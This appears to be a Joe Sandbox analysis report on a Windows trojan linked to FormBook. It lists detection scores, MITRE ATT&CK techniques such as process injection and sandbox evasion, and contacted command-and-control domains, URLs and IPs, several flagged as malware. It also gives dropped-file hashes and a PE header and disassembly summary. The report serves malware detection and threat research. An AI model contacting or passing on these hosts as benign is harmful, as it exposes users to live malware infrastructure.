Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EIvidclKOb.exe	67%	Virustotal		Browse
EIvidclKOb.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject
EIvidclKOb.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://whois.gandi.net/en/results?search=sunnyz.store	0%	Avira URL Cloud	safe
http://www.sfantulandrei.info/wvsm/?_6yxCX=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rBmc4SdotweHLQOOyOBULIHFd1VBahrHXCh9vf/2fl8+QQ==&vNTT0=e8zLx	0%	Avira URL Cloud	safe
http://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z05Tnrv+b0LyIlhV4f69ltmWPUKvodMcjYbnCl+ENwjRpaA==&vNTT0=e8zLx	100%	Avira URL Cloud	malware
http://www.sunnyz.store/ead0/	100%	Avira URL Cloud	malware
http://www.infohive.website/cnve/	0%	Avira URL Cloud	safe
http://www.gk88top.top/vjnn/?_6yxCX=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1C145Dcw9vjhITsM+OTgM5u/otOh0qpDqOlQHZdtVA7DGw==&vNTT0=e8zLx	100%	Avira URL Cloud	malware
http://www.sfantulandrei.info/wvsm/	0%	Avira URL Cloud	safe
https://www.gandi.net/en/domain	0%	Avira URL Cloud	safe
http://www.mffnow.info/0pqe/	0%	Avira URL Cloud	safe
http://www.gk88top.top/vjnn/	100%	Avira URL Cloud	malware
http://www.mffnow.info	0%	Avira URL Cloud	safe
https://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB	100%	Avira URL Cloud	malware
http://www.127358.win/2mep/	0%	Avira URL Cloud	safe
http://www.sunnyz.store/ead0/?vNTT0=e8zLx&_6yxCX=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhrmN7KgNDD+8nl5ENQfO4rN6vw62ks37+HoPu6Jjp4YWnA==	100%	Avira URL Cloud	malware
http://www.muasamgiare.click/dc08/	100%	Avira URL Cloud	malware
http://www.127358.win/2mep/?vNTT0=e8zLx&_6yxCX=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn/wnl45Qbp2dk37eS9E9dWkFwc0rUSawKZLqv+Rq0dg9Eg==	0%	Avira URL Cloud	safe
http://www.qqa79.top/t67p/?vNTT0=e8zLx&_6yxCX=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ+0CfIXjZtKXfKieWYYCHFg55Ay66I4b6tmYJwJaY/ccyg==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
qqa79.top	38.47.233.21	true	true	unknown
webredir.vip.gandi.net	217.70.184.50	true	false	high
www.127358.win	206.238.89.119	true	false	high
www.infohive.website	66.29.149.46	true	true	unknown
dns.ladipage.com	13.228.81.39	true	false	high
www.gk88top.top	172.67.137.47	true	false	high
www.mffnow.info	104.21.96.1	true	false	high
www.sfantulandrei.info	13.248.169.48	true	true	unknown
www.muasamgiare.click	unknown	unknown	false	unknown
www.sunnyz.store	unknown	unknown	false	unknown
www.qqa79.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z05Tnrv+b0LyIlhV4f69ltmWPUKvodMcjYbnCl+ENwjRpaA==&vNTT0=e8zLx	true	Avira URL Cloud: malware	unknown
http://www.infohive.website/cnve/	true	Avira URL Cloud: safe	unknown
http://www.gk88top.top/vjnn/?_6yxCX=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1C145Dcw9vjhITsM+OTgM5u/otOh0qpDqOlQHZdtVA7DGw==&vNTT0=e8zLx	true	Avira URL Cloud: malware	unknown
http://www.sfantulandrei.info/wvsm/	true	Avira URL Cloud: safe	unknown
http://www.sunnyz.store/ead0/	true	Avira URL Cloud: malware	unknown
http://www.sfantulandrei.info/wvsm/?_6yxCX=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rBmc4SdotweHLQOOyOBULIHFd1VBahrHXCh9vf/2fl8+QQ==&vNTT0=e8zLx	true	Avira URL Cloud: safe	unknown
http://www.gk88top.top/vjnn/	true	Avira URL Cloud: malware	unknown
http://www.mffnow.info/0pqe/	true	Avira URL Cloud: safe	unknown
http://www.127358.win/2mep/?vNTT0=e8zLx&_6yxCX=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn/wnl45Qbp2dk37eS9E9dWkFwc0rUSawKZLqv+Rq0dg9Eg==	true	Avira URL Cloud: safe	unknown
http://www.127358.win/2mep/	true	Avira URL Cloud: safe	unknown
http://www.sunnyz.store/ead0/?vNTT0=e8zLx&_6yxCX=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhrmN7KgNDD+8nl5ENQfO4rN6vw62ks37+HoPu6Jjp4YWnA==	true	Avira URL Cloud: malware	unknown
http://www.qqa79.top/t67p/?vNTT0=e8zLx&_6yxCX=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ+0CfIXjZtKXfKieWYYCHFg55Ay66I4b6tmYJwJaY/ccyg==	true	Avira URL Cloud: safe	unknown
http://www.muasamgiare.click/dc08/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://whois.gandi.net/en/results?search=sunnyz.store	comp.exe, 00000005.00000002.3961674856.0000000003D5C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3963017142.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003EFC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gandi.net/en/domain	comp.exe, 00000005.00000002.3961674856.0000000003D5C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3963017142.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003EFC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB	comp.exe, 00000005.00000002.3961674856.0000000003EEE000.00000004.10000000.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.000000000408E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list	comp.exe, 00000005.00000002.3961674856.0000000003BCA000.00000004.10000000.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003D6A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	comp.exe, 00000005.00000002.3961674856.0000000003BCA000.00000004.10000000.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003D6A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mffnow.info	HMKEBhehjTFHSE.exe, 00000007.00000002.3962348656.0000000005978000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.47.233.21	qqa79.top	United States	174	COGENT-174US	true
13.248.169.48	www.sfantulandrei.info	United States	16509	AMAZON-02US	true
104.21.96.1	www.mffnow.info	United States	13335	CLOUDFLARENETUS	false
172.67.137.47	www.gk88top.top	United States	13335	CLOUDFLARENETUS	false
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
13.228.81.39	dns.ladipage.com	United States	16509	AMAZON-02US	false
66.29.149.46	www.infohive.website	United States	19538	ADVANTAGECOMUS	true
206.238.89.119	www.127358.win	United States	174	COGENT-174US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587990
Start date and time:	2025-01-10 20:17:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EIvidclKOb.exe renamed because original name is a hash value
Original Sample Name:	dc94e6d1c534717dc63dec5adbec6bb4f13dada8c5938a937ceb3b923b49f2bd.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@8/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 46 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target HMKEBhehjTFHSE.exe, PID 2132 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
38.47.233.21	Recibos.exe	Get hash	malicious	FormBook	Browse	www.qqa79.top/dp98/
38.47.233.21	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.qqa79.top/dp98/
13.248.169.48	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	www.108.foundation/lnu5/
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/h8xm/
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	www.hsa.world/09b7/
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/5g1j/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.londonatnight.coffee/13to/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
webredir.vip.gandi.net	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Quotation Request-349849.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	MA-DS-2024-03 URGENT.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RFQ _ Virtue 054451000085.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO# 81136575.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	217.70.184.50
	Order No 24.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RFQ.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RFQ.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
www.infohive.website	Quotation Request-349849.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
www.infohive.website	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
www.127358.win	u549ed5dEA.exe	Get hash	malicious	FormBook	Browse	206.238.89.119
	Quotation Request-349849.exe	Get hash	malicious	FormBook	Browse	206.238.89.119
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	206.238.89.119
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	206.238.89.119
	Order MEI PO IM202411484.exe	Get hash	malicious	FormBook	Browse	206.238.89.119
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	206.238.89.119
	need quotations.exe	Get hash	malicious	FormBook	Browse	206.238.89.119

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ht58337iNC.exe	Get hash	malicious	GuLoader	Browse	172.67.152.246
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	psibx9rXra.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	CvzLvta2bG.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	104.21.7.187
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	Message 2.eml	Get hash	malicious	Unknown	Browse	172.64.41.3
AMAZON-02US	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	143.204.205.214
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	18.140.171.98
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	54.189.236.62
	Message.eml	Get hash	malicious	Unknown	Browse	34.249.87.52
	frosty.sh4.elf	Get hash	malicious	Mirai	Browse	18.188.126.130
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	108.138.26.73
COGENT-174US	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	38.47.233.21
	psibx9rXra.exe	Get hash	malicious	FormBook	Browse	154.23.178.183
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	38.181.21.178
	pKXxiawkTj.exe	Get hash	malicious	XWorm	Browse	154.39.0.150
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	154.62.137.46
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	38.148.77.12
	frosty.sh4.elf	Get hash	malicious	Mirai	Browse	23.154.10.225
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	154.23.178.231
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	38.181.21.54
	https://sign-as.allarknow.online/	Get hash	malicious	Unknown	Browse	50.7.127.10

Process:	C:\Windows\SysWOW64\comp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Halitherses

Download File

Process:	C:\Users\user\Desktop\EIvidclKOb.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994294748686637
Encrypted:	true
SSDEEP:	6144:08q8pgwTPf52rlnMNhBv6i/CmEronGie6ydm/+7eBWq1E4p:bpgwTErlnUdB/CmmoGiByD7+JEy
MD5:	7C6B6750ADCF9305FFAB920B7B756FAA
SHA1:	CDF571B71ED02464726E6ABD4203BA59E0D57CE2
SHA-256:	A52541754A1A8EE10C8317F56E23B1FFCB8166ADE8ECF2D8744C9D2606A13C9D
SHA-512:	05239AFFFFE1322F263732E7214EAC23B4D265812999221C9DB3BFE5309A1076C7F6EF18FCC46D3611E107CAE90297C16408DC670B20C8FC5DDAB0EAC1839BB0
Malicious:	false
Reputation:	low
Preview:	...4PTE4=CUT..TH.11LAYJ4.TE49CUTSZTHP11LAYJ4STE49CUTSZTHP11L.YJ4]K.:9.\.r.U...e$(jD!;"FX.u724:'$.S)a+?Zs=+.}..t>50-~<<FeYJ4STE4@B\.n:3.mQV.\|9-.I....#2.I...lQV.[...o4".k6<n:3.P11LAYJ4..E4uBTTCAM.P11LAYJ4.TG52B^TS.PHP11LAYJ4.@E49SUTS*PHP1qLAIJ4SVE4?CUTSZTHV11LAYJ4S$A49AUTSZTHR1q.AYZ4SDE49CETSJTHP11LQYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUT}.10$11L..N4SDE49.QTSJTHP11LAYJ4STE4.CU4SZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11L

C:\Users\user\AppData\Local\Temp\aut12AC.tmp

Download File

Process:	C:\Users\user\Desktop\EIvidclKOb.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994294748686637
Encrypted:	true
SSDEEP:	6144:08q8pgwTPf52rlnMNhBv6i/CmEronGie6ydm/+7eBWq1E4p:bpgwTErlnUdB/CmmoGiByD7+JEy
MD5:	7C6B6750ADCF9305FFAB920B7B756FAA
SHA1:	CDF571B71ED02464726E6ABD4203BA59E0D57CE2
SHA-256:	A52541754A1A8EE10C8317F56E23B1FFCB8166ADE8ECF2D8744C9D2606A13C9D
SHA-512:	05239AFFFFE1322F263732E7214EAC23B4D265812999221C9DB3BFE5309A1076C7F6EF18FCC46D3611E107CAE90297C16408DC670B20C8FC5DDAB0EAC1839BB0
Malicious:	false
Preview:	...4PTE4=CUT..TH.11LAYJ4.TE49CUTSZTHP11LAYJ4STE49CUTSZTHP11L.YJ4]K.:9.\.r.U...e$(jD!;"FX.u724:'$.S)a+?Zs=+.}..t>50-~<<FeYJ4STE4@B\.n:3.mQV.\|9-.I....#2.I...lQV.[...o4".k6<n:3.P11LAYJ4..E4uBTTCAM.P11LAYJ4.TG52B^TS.PHP11LAYJ4.@E49SUTS*PHP1qLAIJ4SVE4?CUTSZTHV11LAYJ4S$A49AUTSZTHR1q.AYZ4SDE49CETSJTHP11LQYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUT}.10$11L..N4SDE49.QTSJTHP11LAYJ4STE4.CU4SZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11LAYJ4STE49CUTSZTHP11L

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.185002674525328
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EIvidclKOb.exe
File size:	1'204'224 bytes
MD5:	76bf1f21c8727faacb6f4761b72e17b8
SHA1:	2f7bf982edbe0a9b8425b5b3e1ac5508d8f46e6b
SHA256:	dc94e6d1c534717dc63dec5adbec6bb4f13dada8c5938a937ceb3b923b49f2bd
SHA512:	2df901ad79808c797712f82c49a12a069033f39b723e8f6bd9c4df33fb0403f4114f88fa0ac5d8ca26284cecdaac2ebff7ec5f72b4ab643ac2f401b97d8f6e9d
SSDEEP:	24576:wu6J33O0c+JY5UZ+XC0kGso6FaUerOGHDik2HIcngCKdWY:6u0c++OCvkGs9FaUe6kDB2xngaY
TLSH:	D645CF2273DDC360CB769173BF6AB7016EBF38614630B95B2F980D7DA850162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675FBA4C [Mon Dec 16 05:27:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F37D4D5340Ah
jmp 00007F37D4D461D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F37D4D4635Ah
cmp edi, eax
jc 00007F37D4D466BEh
bt dword ptr [004C31FCh], 01h
jnc 00007F37D4D46359h
rep movsb
jmp 00007F37D4D4666Ch
cmp ecx, 00000080h
jc 00007F37D4D46524h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F37D4D46360h
bt dword ptr [004BE324h], 01h
jc 00007F37D4D46830h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F37D4D464FDh
test edi, 00000003h
jne 00007F37D4D4650Eh
test esi, 00000003h
jne 00007F37D4D464EDh
bt edi, 02h
jnc 00007F37D4D4635Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F37D4D46363h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F37D4D463B5h
bt esi, 03h
jnc 00007F37D4D46408h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

